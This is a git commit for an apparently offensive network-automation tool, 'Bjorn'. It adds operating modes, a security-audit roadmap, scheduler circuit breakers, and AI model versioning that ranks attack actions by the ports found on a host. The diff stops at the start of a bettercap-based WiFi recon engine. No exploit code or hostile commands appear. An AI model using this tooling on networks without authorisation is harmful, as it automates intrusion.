Add Loki and Sentinel utility classes for web API endpoints

- Implemented LokiUtils class with GET and POST endpoints for managing scripts, jobs, and payloads.
- Added SentinelUtils class with GET and POST endpoints for managing events, rules, devices, and notifications.
- Both classes include error handling and JSON response formatting.
This commit is contained in:
infinition
2026-03-14 22:33:10 +01:00
parent eb20b168a6
commit aac77a3e76
525 changed files with 29400 additions and 13136 deletions

View File

@@ -235,8 +235,10 @@ class Bjorn:
backoff_s = 1.0
while not self.shared_data.should_exit:
try:
# Manual mode must stop orchestration so the user keeps full control.
if self.shared_data.operation_mode == "MANUAL":
# Manual/Bifrost mode must stop orchestration.
# BIFROST: WiFi is in monitor mode, no network available for scans.
current_mode = self.shared_data.operation_mode
if current_mode in ("MANUAL", "BIFROST", "LOKI"):
# Avoid spamming stop requests if already stopped.
if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
self.stop_orchestrator()
@@ -257,7 +259,7 @@ class Bjorn:
backoff_s = min(backoff_s * 2.0, 30.0)
def check_and_start_orchestrator(self):
if self.shared_data.operation_mode == "MANUAL":
if self.shared_data.operation_mode in ("MANUAL", "BIFROST", "LOKI"):
return
if self.is_network_connected():
self.wifi_connected = True
@@ -300,9 +302,14 @@ class Bjorn:
self.orchestrator = None
return
# Keep MANUAL sticky so supervisor does not auto-restart orchestration.
# Keep MANUAL sticky so supervisor does not auto-restart orchestration,
# but only if the current mode isn't already handling it.
# - MANUAL/BIFROST: already non-AUTO, no need to change
# - AUTO: let it be — orchestrator will restart naturally (e.g. after Bifrost auto-disable)
try:
self.shared_data.operation_mode = "MANUAL"
current = self.shared_data.operation_mode
if current == "AI":
self.shared_data.operation_mode = "MANUAL"
except Exception:
pass
@@ -320,12 +327,19 @@ class Bjorn:
key="orch_stop_not_graceful",
interval_s=20,
)
return
# Still reset status so UI doesn't stay stuck on the
# last action while the thread finishes in the background.
else:
self.orchestrator_thread = None
self.orchestrator = None
self.orchestrator_thread = None
self.orchestrator = None
# Always reset display state regardless of whether join succeeded.
self.shared_data.bjorn_orch_status = "IDLE"
self.shared_data.bjorn_status_text = "IDLE"
self.shared_data.bjorn_status_text2 = ""
self.shared_data.action_target_ip = ""
self.shared_data.active_action = None
self.shared_data.update_status("IDLE", "")
def is_network_connected(self):
"""Checks for network connectivity with throttling and low-CPU checks."""
@@ -441,6 +455,22 @@ def handle_exit(
except Exception:
pass
# 2c. Stop Sentinel Watchdog
try:
engine = getattr(shared_data, 'sentinel_engine', None)
if engine and hasattr(engine, 'stop'):
engine.stop()
except Exception:
pass
# 2d. Stop Bifrost Engine
try:
engine = getattr(shared_data, 'bifrost_engine', None)
if engine and hasattr(engine, 'stop'):
engine.stop()
except Exception:
pass
# 3. Stop Web Server
try:
if web_thread_obj and hasattr(web_thread_obj, "shutdown"):
@@ -517,6 +547,45 @@ if __name__ == "__main__":
health_thread = HealthMonitor(shared_data, interval_s=health_interval)
health_thread.start()
# Sentinel watchdog — start if enabled in config
try:
from sentinel import SentinelEngine
sentinel_engine = SentinelEngine(shared_data)
shared_data.sentinel_engine = sentinel_engine
if shared_data.config.get("sentinel_enabled", False):
sentinel_engine.start()
logger.info("Sentinel watchdog started")
else:
logger.info("Sentinel watchdog loaded (disabled)")
except Exception as e:
logger.warning("Sentinel init skipped: %s", e)
# Bifrost engine — start if enabled in config
try:
from bifrost import BifrostEngine
bifrost_engine = BifrostEngine(shared_data)
shared_data.bifrost_engine = bifrost_engine
if shared_data.config.get("bifrost_enabled", False):
bifrost_engine.start()
logger.info("Bifrost engine started")
else:
logger.info("Bifrost engine loaded (disabled)")
except Exception as e:
logger.warning("Bifrost init skipped: %s", e)
# Loki engine — start if enabled in config
try:
from loki import LokiEngine
loki_engine = LokiEngine(shared_data)
shared_data.loki_engine = loki_engine
if shared_data.config.get("loki_enabled", False):
loki_engine.start()
logger.info("Loki engine started")
else:
logger.info("Loki engine loaded (disabled)")
except Exception as e:
logger.warning("Loki init skipped: %s", e)
# Signal Handlers
exit_handler = lambda s, f: handle_exit(
s,

315
ROADMAP.md Normal file
View File

@@ -0,0 +1,315 @@
# BJORN Cyberviking — Roadmap & Changelog
> Comprehensive audit-driven roadmap for the v2 release.
> Each section tracks scope, status, and implementation notes.
---
## Legend
| Tag | Meaning |
|-----|---------|
| `[DONE]` | Implemented and verified |
| `[WIP]` | Work in progress |
| `[TODO]` | Not yet started |
| `[DROPPED]` | Descoped / won't fix |
---
## P0 — Security & Blockers (Must-fix before release)
### SEC-01: Shell injection in system_utils.py `[DONE]`
- **File:** `web_utils/system_utils.py`
- **Issue:** `subprocess.Popen(command, shell=True)` on reboot, shutdown, restart, clear_logs
- **Fix:** Replace all `shell=True` calls with argument lists (`["sudo", "reboot"]`)
- **Risk:** Command injection if any parameter is ever user-controlled
### SEC-02: Path traversal in DELETE route `[DONE]`
- **File:** `webapp.py:497-498`
- **Issue:** MAC address extracted from URL path with no validation — `self.path.split(...)[-1]`
- **Fix:** URL-decode and validate MAC format with regex before passing to handler
### SEC-03: Path traversal in file operations `[DONE]`
- **File:** `web_utils/file_utils.py`
- **Issue:** `move_file`, `rename_file`, `delete_file` accept paths from POST body.
Path validation uses `startswith()` which can be bypassed (symlinks, encoding).
- **Fix:** Use `os.path.realpath()` instead of `os.path.abspath()` for canonicalization.
Add explicit path validation helper used by all file ops.
### SEC-04: Cortex secrets committed to repo `[DONE]`
- **Files:** `bjorn-cortex/Cortex/security_config.json`, `server_config.json`
- **Issue:** JWT secret, TOTP secret, admin password hash, device API key in git
- **Fix:** Replaced with clearly-marked placeholder values + WARNING field, already in `.gitignore`
### SEC-05: Cortex WebSocket without auth `[DONE]`
- **File:** `bjorn-cortex/Cortex/server.py`
- **Issue:** `/ws/logs` endpoint has no authentication — anyone can see training logs
- **Fix:** Added `_verify_ws_token()` — JWT via query param or first message, close 4401 on failure
### SEC-06: Cortex device API auth disabled by default `[DONE]`
- **File:** `bjorn-cortex/Cortex/server_config.json`
- **Issue:** `allow_device_api_without_auth: true` + empty `device_api_key`
- **Fix:** Default to `false`, placeholder API key, CORS origins via `CORS_ORIGINS` env var
---
## P0 — Bluetooth Fixes
### BT-01: Bare except clauses `[DONE]`
- **File:** `web_utils/bluetooth_utils.py:225,258`
- **Issue:** `except:` swallows all exceptions including SystemExit, KeyboardInterrupt
- **Fix:** Replace with `except (dbus.exceptions.DBusException, Exception) as e:` with logging
### BT-02: Null address passed to BT functions `[DONE]`
- **File:** `webapp.py:210-214`
- **Issue:** `d.get('address')` can return None, passed directly to BT methods
- **Fix:** Add null check + early return with error in each lambda/BT method entry point
### BT-03: Race condition on bt.json `[DONE]`
- **File:** `web_utils/bluetooth_utils.py:200-216`
- **Issue:** Read-modify-write on shared file without locking
- **Fix:** Add `threading.Lock` for bt.json access, use atomic write pattern
### BT-04: auto_bt_connect service crash `[DONE]`
- **File:** `web_utils/bluetooth_utils.py:219`
- **Issue:** `subprocess.run(..., check=True)` raises CalledProcessError if service missing
- **Fix:** Use `check=False` and log warning instead of crashing
---
## P0 — Web Server Fixes
### WEB-01: SSE reconnect counter reset bug `[DONE]`
- **File:** `web/js/core/console-sse.js:367`
- **Issue:** `reconnectCount = 0` on every message — a single flaky message resets counter,
enabling infinite reconnect loops
- **Fix:** Only reset counter after sustained healthy connection (e.g., 5+ messages)
### WEB-02: Silent routes list has trailing empty string `[DONE]`
- **File:** `webapp.py:474`
- **Issue:** Empty string `""` in `silent_routes` matches ALL log messages
- **Fix:** Remove empty string from list
---
## P1 — Stability & Consistency
### STAB-01: Uniform error handling pattern `[DONE]`
- **Files:** All `web_utils/*.py`
- **Issue:** Mix of bare `except:`, `except Exception`, inconsistent error response format
- **Fix:** Establish `_json_response(handler, data, status)` helper; catch specific exceptions
### STAB-02: Add pagination to heavy API endpoints `[DONE]`
- **Files:** `web_utils/netkb_utils.py`, `web_utils/orchestrator_utils.py`
- **Endpoints:** `/netkb_data`, `/list_credentials`, `/network_data`
- **Fix:** Accept `?page=N&per_page=M` query params, return `{data, total, page, pages}`
### STAB-03: Dead routes & unmounted pages `[DONE]`
- **Files:** `web/js/app.js`, various
- **Issue:** GPS UI elements with no backend, rl-dashboard not mounted, zombieland incomplete
- **Fix:** Remove GPS placeholder, wire rl-dashboard mount, mark zombieland as beta
### STAB-04: Missing constants for magic numbers `[DONE]`
- **Files:** `web_utils/bluetooth_utils.py`, `webapp.py`
- **Fix:** Extract timeout values, pool sizes, size limits to named constants
---
## P2 — Web SPA Quality
### SPA-01: Review & fix dashboard.js `[DONE]`
- Check stat polling, null safety, error display
### SPA-02: Review & fix network.js `[DONE]`
- D3 graph cleanup on unmount, memory leak check
### SPA-03: Review & fix credentials.js `[DONE]`
- Search/filter robustness, export edge cases
### SPA-04: Review & fix vulnerabilities.js `[DONE]`
- CVE modal error handling, feed sync status
### SPA-05: Review & fix files.js `[DONE]`
- Upload progress, drag-drop edge cases, path validation
### SPA-06: Review & fix netkb.js `[DONE]`
- View mode transitions, filter persistence, pagination integration
### SPA-07: Review & fix web-enum.js `[DONE]`
- Status code filter, date range, export completeness
### SPA-08: Review & fix rl-dashboard.js `[DONE]`
- Canvas cleanup, mount lifecycle, null data handling
### SPA-09: Review & fix zombieland.js (C2) `[DONE]`
- SSE lifecycle, agent list refresh, mark as experimental
### SPA-10: Review & fix scripts.js `[DONE]`
- Output polling cleanup, project upload validation
### SPA-11: Review & fix attacks.js `[DONE]`
- Tab switching, image upload validation
### SPA-12: Review & fix bjorn.js (EPD viewer) `[DONE]`
- Image refresh, zoom controls, null EPD state
### SPA-13: Review & fix settings-config.js `[DONE]`
- Form generation edge cases, chip editor validation
### SPA-14: Review & fix actions-studio.js `[DONE]`
- Canvas lifecycle, node dragging, edge persistence
---
## P2 — AI/Cortex Improvements
### AI-01: Feature selection / importance analysis `[DONE]`
- Variance-based feature filtering in data consolidator (drops near-zero variance features)
- Feature manifest exported alongside training data
- `get_feature_importance()` method on FeatureLogger for introspection
- Config: `ai_feature_selection_min_variance` (default 0.001)
### AI-02: Continuous reward shaping `[DONE]`
- Extended reward function with 4 new components: novelty bonus, repeat penalty,
diminishing returns, partial credit for long-running failed actions
- Helper methods to query attempt counts and consecutive failures from ml_features
### AI-03: Model versioning & rollback `[DONE]`
- Keep up to 3 model versions on disk (configurable)
- Model history tracking: version, loaded_at, accuracy, avg_reward
- `rollback_model()` method to load previous version
- Auto-rollback if average reward drops below previous model after 50 decisions
### AI-04: Low-data cold-start bootstrap `[DONE]`
- Bootstrap scores dict accumulating per (action_name, port_profile) running averages
- Blended heuristic/bootstrap scoring (40-80% weight based on sample count)
- Persistent `ai_bootstrap_scores.json` across restarts
- Config: `ai_cold_start_bootstrap_weight` (default 0.6)
---
## P3 — Future Features
### EPD-01: Multi-size EPD layout engine `[DONE]`
- New `display_layout.py` module with `DisplayLayout` class
- JSON layout definitions per EPD type (2.13", 2.7")
- Element-based positioning: each UI component has named anchor `{x, y, w, h}`
- Custom layouts stored in `resources/layouts/{epd_type}.json`
- `px()`/`py()` scaling preserved, layout provides reference coordinates
- Integrated into `display.py` rendering pipeline
### EPD-02: Web-based EPD layout editor `[DONE]`
- Backend API: `GET/POST /api/epd/layout`, `POST /api/epd/layout/reset`
- `GET /api/epd/layouts` lists all supported EPD types and their layouts
- `GET /api/epd/layout?epd_type=X` to fetch layout for a specific EPD type
- Frontend editor: `web/js/core/epd-editor.js` — 4th tab in attacks page
- SVG canvas with drag-and-drop element positioning and corner resize handles
- Display mode preview: Color, NB (black-on-white), BN (white-on-black)
- Grid/snap, zoom (50-600%), toggleable element labels
- Add/delete elements, import/export layout JSON
- Properties panel with x/y/w/h editors, font size editors
- Undo system (50-deep snapshot stack, Ctrl+Z)
- Color-coded elements by type (icons=blue, text=green, bars=orange, etc.)
- Transparency-aware checkerboard canvas background
- Arrow key nudge, keyboard shortcuts
### ORCH-01: Per-action circuit breaker `[DONE]`
- New `action_circuit_breaker` DB table: failure_streak, circuit_status, cooldown_until
- Three states: closed → open (after N fails) → half_open (after cooldown)
- Exponential backoff: `min(2^streak * 60, 3600)` seconds
- Integrated into `_should_queue_action()` check
- Success on half-open resets circuit, failure re-opens with longer cooldown
- Config: `circuit_breaker_threshold` (default 3)
### ORCH-02: Global concurrency limiter `[DONE]`
- DB-backed running action count check before scheduling
- `count_running_actions()` method in queue.py
- Per-action `max_concurrent` support in requirements evaluator
- Respects `semaphore_slots` config (default 5)
### ORCH-03: Manual mode with active scanning `[DONE]`
- Background scan timer thread in MANUAL mode
- NetworkScanner runs at `manual_mode_scan_interval` (default 180s)
- Config: `manual_mode_auto_scan` (default True)
- Scan timer auto-stops when switching back to AUTO/AI
---
## Changelog
### 2026-03-12 — Security & Stability Audit
#### Security
- **[SEC-01]** Replaced all `shell=True` subprocess calls with safe argument lists
- **[SEC-02]** Added MAC address validation (regex) in DELETE route handler
- **[SEC-03]** Strengthened path validation using `os.path.realpath()` + dedicated helper
- **[BT-01]** Replaced bare `except:` with specific exception handling + logging
- **[BT-02]** Added null address validation in Bluetooth route lambdas and method entry points
- **[BT-03]** Added file lock for bt.json read/write operations
- **[BT-04]** Changed auto_bt_connect restart to non-fatal (check=False)
- **[SEC-04]** Cortex config files: placeholder secrets + WARNING field, already gitignored
- **[SEC-05]** Added JWT auth to Cortex WebSocket `/ws/logs` endpoint
- **[SEC-06]** Cortex device API auth now required by default, CORS configurable via env var
#### Bug Fixes
- **[WEB-01]** Fixed SSE reconnect counter: only resets after 5+ consecutive healthy messages
- **[WEB-02]** Removed empty string from silent_routes that was suppressing all log messages
- **[STAB-03]** Cleaned up dead GPS UI references, wired rl-dashboard mount
- **[ORCH-BUG]** Fixed Auto→Manual mode switch not resetting status to IDLE (4-location fix):
- `orchestrator.py`: Reset all status fields after main loop exit AND after action completes with exit flag
- `Bjorn.py`: Reset status even when `thread.join(10)` times out
- `orchestrator_utils.py`: Explicit IDLE reset in web API stop handler
#### Quality
- **[STAB-01]** Standardized error handling across web_utils modules
- **[STAB-04]** Extracted magic numbers to named constants
#### SPA Page Review (SPA-01..14)
All 18 SPA page modules reviewed and fixed:
**Pages fully rewritten (11 pages):**
- **dashboard.js** — New layout with ResourceTracker, safe DOM (no innerHTML), visibility-aware pollers, proper uptime ticker cleanup
- **network.js** — D3 force graph cleanup on unmount, lazy d3 loading, search debounce tracked, simulation stop
- **credentials.js** — AbortController tracked, toast timer tracked, proper state reset in unmount
- **vulnerabilities.js** — ResourceTracker integration, abort controllers, null safety throughout
- **files.js** — Upload progress, drag-drop safety, ResourceTracker lifecycle
- **netkb.js** — View mode persistence, filter tracked, pagination integration
- **web-enum.js** — Status filter, date range, tracked pollers and timeouts
- **rl-dashboard.js** — Canvas cleanup, chart lifecycle, null data guards
- **zombieland.js** — SSE lifecycle tracked, agent list cleanup, experimental flag
- **attacks.js** — Tab switching, ResourceTracker integration, proper cleanup
- **bjorn.js** — Image refresh tracked, zoom controls, null EPD state handling
**Pages with targeted fixes (7 pages):**
- **bjorn-debug.js** — Fixed 3 button event listeners using raw `addEventListener``tracker.trackEventListener` (memory leak)
- **scheduler.js** — Added `searchDeb` timeout cleanup + state reset in unmount (zombie timer)
- **actions.js** — Added resize debounce cleanup in unmount + tracked `highlightPane` timeout (zombie timer)
- **backup.js** — Already clean: ResourceTracker, sidebar layout cleanup, state reset (no changes needed)
- **database.js** — Already clean: search debounce cleanup, sidebar layout, Poller lifecycle (no changes needed)
- **loot.js** — Already clean: search timer cleanup, ResourceTracker, state reset (no changes needed)
- **actions-studio.js** — Already clean: runtime cleanup function, ResourceTracker (no changes needed)
#### AI Pipeline (AI-01..04)
- **[AI-01]** Feature selection: variance-based filtering in `data_consolidator.py`, feature manifest export, `get_feature_importance()` in `feature_logger.py`
- **[AI-02]** Continuous reward shaping in `orchestrator.py`: novelty bonus, diminishing returns penalty, partial credit for long-running failures, attempt/streak DB queries
- **[AI-03]** Model versioning in `ai_engine.py`: 3-model history, `rollback_model()`, auto-rollback after 50 decisions if avg reward drops
- **[AI-04]** Cold-start bootstrap in `ai_engine.py`: persistent `ai_bootstrap_scores.json`, blended heuristic/bootstrap scoring with adaptive weighting
#### Orchestrator (ORCH-01..03)
- **[ORCH-01]** Circuit breaker: new `action_circuit_breaker` DB table in `db_utils/queue.py`, 3-state machine (closed→open→half-open), exponential backoff `min(2^N*60, 3600)s`, integrated into `action_scheduler.py` scheduling decisions and `orchestrator.py` post-execution
- **[ORCH-02]** Global concurrency limiter: `count_running_actions()` in `db_utils/queue.py`, pre-schedule check in `action_scheduler.py` against `semaphore_slots` config
- **[ORCH-03]** Manual mode scanning: background `_scan_loop` thread in `orchestrator_utils.py`, runs at `manual_mode_scan_interval` (180s default), auto-stops on mode switch
#### EPD Multi-Size (EPD-01..02)
- **[EPD-01]** New `display_layout.py` module: `DisplayLayout` class with JSON-based element positioning, built-in layouts for 2.13" and 2.7" displays, custom layout override via `resources/layouts/`, 20+ elements integrated into `display.py` rendering pipeline
- **[EPD-02]** Backend API: `GET/POST /api/epd/layout`, `POST /api/epd/layout/reset`, `GET /api/epd/layouts` — endpoints in `web_utils/system_utils.py`, routes in `webapp.py`
- **[EPD-02]** Frontend editor: `web/js/core/epd-editor.js` as 4th tab in attacks page — SVG drag-and-drop canvas, resize handles, Color/NB/BN display modes, grid/snap/zoom, add/delete elements, import/export JSON, undo stack, font size editing, arrow key nudge
#### New Configuration Parameters
- `ai_feature_selection_min_variance` (0.001) — minimum variance for feature inclusion
- `ai_model_history_max` (3) — max model versions kept on disk
- `ai_auto_rollback_window` (50) — decisions before auto-rollback evaluation
- `ai_cold_start_bootstrap_weight` (0.6) — bootstrap vs static heuristic weight
- `circuit_breaker_threshold` (3) — consecutive failures to open circuit
- `manual_mode_auto_scan` (true) — auto-scan in MANUAL mode
- `manual_mode_scan_interval` (180) — seconds between manual mode scans

View File

@@ -974,6 +974,32 @@ class ActionScheduler:
"""
self_port = 0 if target_port is None else int(target_port)
# Circuit breaker check (ORCH-01)
if self.db.is_circuit_open(action_name, mac):
logger.debug(f"Circuit breaker open for {action_name}/{mac}, skipping")
return False
# Global concurrency limit check (ORCH-02)
running_count = self.db.count_running_actions()
max_concurrent = int(getattr(self.shared_data, 'semaphore_slots', 5))
if running_count >= max_concurrent:
logger.debug(f"Concurrency limit reached ({running_count}/{max_concurrent}), skipping {action_name}")
return False
# Per-action concurrency limit (ORCH-02)
requires_raw = action_def.get("b_requires", "")
if requires_raw:
try:
req_obj = json.loads(requires_raw) if isinstance(requires_raw, str) else requires_raw
if isinstance(req_obj, dict) and "max_concurrent" in req_obj:
max_per_action = int(req_obj["max_concurrent"])
running_for_action = self.db.count_running_actions(action_name=action_name)
if running_for_action >= max_per_action:
logger.debug(f"Per-action concurrency limit for {action_name} ({running_for_action}/{max_per_action})")
return False
except (json.JSONDecodeError, TypeError, ValueError):
pass
# 0) Duplicate protection (active)
existing = self.db.query(
"""

View File

@@ -60,6 +60,24 @@ class BjornAIEngine:
self.last_server_attempted = False
self.last_server_contact_ok = None
# AI-03: Model versioning & rollback
self._previous_model = None # {weights, config, feature_config}
self._model_history = [] # [{version, loaded_at, accuracy, avg_reward}]
self._max_model_versions_on_disk = 3
self._performance_window = [] # recent reward values for current model
self._performance_check_interval = int(
getattr(shared_data, 'ai_model_perf_check_interval', 50)
)
self._prev_model_avg_reward = None # avg reward of the model we replaced
# AI-04: Cold-start bootstrap scores
self._bootstrap_scores = {} # {(action_name, port_profile): [total_reward, count]}
self._bootstrap_file = self.model_dir / 'ai_bootstrap_scores.json'
self._bootstrap_weight = float(
getattr(shared_data, 'ai_cold_start_bootstrap_weight', 0.6)
)
self._load_bootstrap_scores()
# Try to load latest model
self._load_latest_model()
@@ -105,7 +123,8 @@ class BjornAIEngine:
return
# 2. Sort by timestamp in filename (lexicographical) and pick latest
latest_model = sorted(valid_models)[-1]
valid_models = sorted(valid_models)
latest_model = valid_models[-1]
weights_file = latest_model.with_name(latest_model.stem + '_weights.json')
logger.info(f"Loading model: {latest_model.name} (Weights exists!)")
@@ -113,28 +132,80 @@ class BjornAIEngine:
with open(latest_model, 'r') as f:
model_data = json.load(f)
self.model_config = model_data.get('config', model_data)
self.feature_config = model_data.get('features', {})
new_config = model_data.get('config', model_data)
new_feature_config = model_data.get('features', {})
# Load weights
with open(weights_file, 'r') as f:
weights_data = json.load(f)
self.model_weights = {
new_weights = {
k: np.array(v) for k, v in weights_data.items()
}
del weights_data # Free raw dict — numpy arrays are the canonical form
# AI-03: Save previous model for rollback
if self.model_loaded and self.model_weights is not None:
self._previous_model = {
'weights': self.model_weights,
'config': self.model_config,
'feature_config': self.feature_config,
}
# Record avg reward of outgoing model for performance comparison
if self._performance_window:
self._prev_model_avg_reward = (
sum(self._performance_window) / len(self._performance_window)
)
self._performance_window = [] # reset for new model
self.model_config = new_config
self.feature_config = new_feature_config
self.model_weights = new_weights
self.model_loaded = True
# AI-03: Track model history
from datetime import datetime as _dt
version = self.model_config.get('version', 'unknown')
self._model_history.append({
'version': version,
'loaded_at': _dt.now().isoformat(),
'accuracy': self.model_config.get('accuracy'),
'avg_reward': None, # filled later as decisions accumulate
})
# Keep history bounded
if len(self._model_history) > 10:
self._model_history = self._model_history[-10:]
logger.success(
f"Model loaded successfully: {self.model_config.get('version', 'unknown')}"
f"Model loaded successfully: {version}"
)
# AI-03: Prune old model versions on disk (keep N most recent)
self._prune_old_model_files(valid_models)
except Exception as e:
logger.error(f"Failed to load model: {e}")
import traceback
logger.debug(traceback.format_exc())
self.model_loaded = False
def _prune_old_model_files(self, valid_models: list):
"""AI-03: Keep only the N most recent model versions on disk."""
try:
keep = self._max_model_versions_on_disk
if len(valid_models) <= keep:
return
to_remove = valid_models[:-keep]
for config_path in to_remove:
weights_path = config_path.with_name(config_path.stem + '_weights.json')
try:
config_path.unlink(missing_ok=True)
weights_path.unlink(missing_ok=True)
logger.info(f"Pruned old model: {config_path.name}")
except Exception as e:
logger.debug(f"Could not prune {config_path.name}: {e}")
except Exception as e:
logger.debug(f"Model pruning error: {e}")
def reload_model(self) -> bool:
"""Reload model from disk"""
logger.info("Reloading AI model...")
@@ -146,6 +217,100 @@ class BjornAIEngine:
self._load_latest_model()
return self.model_loaded
def rollback_model(self) -> bool:
"""
AI-03: Rollback to the previous model version.
Returns True if rollback succeeded.
"""
if self._previous_model is None:
logger.warning("No previous model available for rollback")
return False
logger.info("Rolling back to previous model version...")
# Current model becomes the "next" previous (so we can undo a rollback)
current_backup = None
if self.model_loaded and self.model_weights is not None:
current_backup = {
'weights': self.model_weights,
'config': self.model_config,
'feature_config': self.feature_config,
}
self.model_weights = self._previous_model['weights']
self.model_config = self._previous_model['config']
self.feature_config = self._previous_model['feature_config']
self.model_loaded = True
self._previous_model = current_backup
self._performance_window = [] # reset
version = self.model_config.get('version', 'unknown')
from datetime import datetime as _dt
self._model_history.append({
'version': f"{version}_rollback",
'loaded_at': _dt.now().isoformat(),
'accuracy': self.model_config.get('accuracy'),
'avg_reward': None,
})
logger.success(f"Rolled back to model version: {version}")
return True
def record_reward(self, reward: float):
"""
AI-03: Record a reward for performance tracking.
After N decisions, auto-rollback if performance has degraded.
"""
self._performance_window.append(reward)
# Update current history entry
if self._model_history:
self._model_history[-1]['avg_reward'] = round(
sum(self._performance_window) / len(self._performance_window), 2
)
# Check for auto-rollback after sufficient samples
if len(self._performance_window) >= self._performance_check_interval:
current_avg = sum(self._performance_window) / len(self._performance_window)
if (
self._prev_model_avg_reward is not None
and current_avg < self._prev_model_avg_reward
and self._previous_model is not None
):
logger.warning(
f"Model performance degraded: current avg={current_avg:.2f} vs "
f"previous avg={self._prev_model_avg_reward:.2f}. Auto-rolling back."
)
self.rollback_model()
else:
logger.info(
f"Model performance check passed: avg_reward={current_avg:.2f} "
f"over {len(self._performance_window)} decisions"
)
# Reset window for next check cycle
self._performance_window = []
def get_model_info(self) -> Dict[str, Any]:
"""AI-03: Return current version, history, and performance stats."""
current_avg = None
if self._performance_window:
current_avg = round(
sum(self._performance_window) / len(self._performance_window), 2
)
return {
'current_version': self.model_config.get('version') if self.model_config else None,
'model_loaded': self.model_loaded,
'has_previous_model': self._previous_model is not None,
'history': list(self._model_history),
'performance': {
'current_avg_reward': current_avg,
'decisions_since_load': len(self._performance_window),
'check_interval': self._performance_check_interval,
'previous_model_avg_reward': self._prev_model_avg_reward,
},
}
def check_for_updates(self) -> bool:
"""Check AI Server for new model version."""
self.last_server_attempted = False
@@ -596,6 +761,58 @@ class BjornAIEngine:
if 'dump' in name or 'extract' in name: return 'extraction'
return 'other'
# ═══════════════════════════════════════════════════════════════════════
# AI-04: COLD-START BOOTSTRAP
# ═══════════════════════════════════════════════════════════════════════
def _load_bootstrap_scores(self):
"""Load persisted bootstrap scores from disk."""
try:
if self._bootstrap_file.exists():
with open(self._bootstrap_file, 'r') as f:
raw = json.load(f)
# Stored as {"action|profile": [total_reward, count], ...}
for key_str, val in raw.items():
parts = key_str.split('|', 1)
if len(parts) == 2 and isinstance(val, list) and len(val) == 2:
self._bootstrap_scores[(parts[0], parts[1])] = val
logger.info(f"Loaded {len(self._bootstrap_scores)} bootstrap score entries")
except Exception as e:
logger.debug(f"Could not load bootstrap scores: {e}")
def _save_bootstrap_scores(self):
"""Persist bootstrap scores to disk."""
try:
serializable = {
f"{k[0]}|{k[1]}": v for k, v in self._bootstrap_scores.items()
}
with open(self._bootstrap_file, 'w', encoding='utf-8') as f:
json.dump(serializable, f)
except Exception as e:
logger.debug(f"Could not save bootstrap scores: {e}")
def update_bootstrap(self, action_name: str, port_profile: str, reward: float):
"""
AI-04: Update running average reward for an (action, port_profile) pair.
Called after each action execution to accumulate real performance data.
"""
key = (action_name, port_profile)
if key not in self._bootstrap_scores:
self._bootstrap_scores[key] = [0.0, 0]
entry = self._bootstrap_scores[key]
entry[0] += reward
entry[1] += 1
# Persist periodically (every 5 updates to reduce disk writes)
total_updates = sum(v[1] for v in self._bootstrap_scores.values())
if total_updates % 5 == 0:
self._save_bootstrap_scores()
logger.debug(
f"Bootstrap updated: {action_name}+{port_profile} "
f"avg={entry[0]/entry[1]:.1f} (n={entry[1]})"
)
# ═══════════════════════════════════════════════════════════════════════
# HEURISTIC FALLBACK
# ═══════════════════════════════════════════════════════════════════════
@@ -641,7 +858,7 @@ class BjornAIEngine:
) -> Tuple[str, float, Dict[str, Any]]:
"""
Use rule-based heuristics for action selection.
Provides decent performance without machine learning.
AI-04: Blends static rules with bootstrap scores from actual execution data.
"""
try:
mac = host_context.get('mac', '')
@@ -655,30 +872,60 @@ class BjornAIEngine:
# Detect port profile
port_profile = self._detect_port_profile(ports)
# Scoring system
action_scores = {action: 0.0 for action in available_actions}
# Static heuristic scoring
static_scores = {action: 0.0 for action in available_actions}
# Score based on ports
for port in ports:
if port in self.heuristics['port_based']:
for action in self.heuristics['port_based'][port]:
if action in action_scores:
action_scores[action] += 0.3
if action in static_scores:
static_scores[action] += 0.3
# Score based on services
for service in services:
if service in self.heuristics['service_based']:
for action in self.heuristics['service_based'][service]:
if action in action_scores:
action_scores[action] += 0.4
if action in static_scores:
static_scores[action] += 0.4
# Score based on port profile
if port_profile in self.heuristics['profile_based']:
for action in self.heuristics['profile_based'][port_profile]:
if action in action_scores:
action_scores[action] += 0.3
if action in static_scores:
static_scores[action] += 0.3
# AI-04: Blend static scores with bootstrap scores
blended_scores = {}
bootstrap_used = False
for action in available_actions:
static_score = static_scores.get(action, 0.0)
key = (action, port_profile)
entry = self._bootstrap_scores.get(key)
if entry and entry[1] > 0:
bootstrap_used = True
bootstrap_avg = entry[0] / entry[1]
# Normalize bootstrap avg to 0-1 range (assume reward range ~-30 to +200)
bootstrap_norm = max(0.0, min(1.0, (bootstrap_avg + 30) / 230))
sample_count = entry[1]
# Lerp bootstrap weight from 40% to 80% over 20 samples
base_weight = self._bootstrap_weight # default 0.6
if sample_count < 20:
# Interpolate: at 1 sample -> 0.4, at 20 samples -> 0.8
t = (sample_count - 1) / 19.0
bootstrap_w = 0.4 + t * (0.8 - 0.4)
else:
bootstrap_w = 0.8
static_w = 1.0 - bootstrap_w
blended_scores[action] = static_w * static_score + bootstrap_w * bootstrap_norm
else:
blended_scores[action] = static_score
# Find best action
action_scores = blended_scores
if action_scores:
best_action = max(action_scores, key=action_scores.get)
best_score = action_scores[best_action]
@@ -688,11 +935,12 @@ class BjornAIEngine:
best_score = min(best_score / 1.0, 1.0)
debug_info = {
'method': 'heuristics',
'method': 'heuristics_bootstrap' if bootstrap_used else 'heuristics',
'port_profile': port_profile,
'ports': list(ports)[:10],
'services': services,
'all_scores': {k: v for k, v in action_scores.items() if v > 0}
'bootstrap_used': bootstrap_used,
'all_scores': {k: round(v, 4) for k, v in action_scores.items() if v > 0}
}
return best_action, best_score, debug_info
@@ -833,6 +1081,12 @@ class BjornAIEngine:
'training_samples': self.model_config.get('training_samples')
})
# AI-03: Include model versioning info
stats['model_info'] = self.get_model_info()
# AI-04: Include bootstrap stats
stats['bootstrap_entries'] = len(self._bootstrap_scores)
return stats

585
bifrost/__init__.py Normal file
View File

@@ -0,0 +1,585 @@
"""
Bifrost — Pwnagotchi-compatible WiFi recon engine for Bjorn.
Runs as a daemon thread alongside MANUAL/AUTO/AI modes.
"""
import os
import time
import subprocess
import threading
import logging
from logger import Logger
logger = Logger(name="bifrost", level=logging.DEBUG)
class BifrostEngine:
"""Main Bifrost lifecycle manager.
Manages the bettercap subprocess and BifrostAgent daemon loop.
Pattern follows SentinelEngine (sentinel.py).
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self._thread = None
self._stop_event = threading.Event()
self._running = False
self._bettercap_proc = None
self._monitor_torn_down = False
self._monitor_failed = False
self.agent = None
@property
def enabled(self):
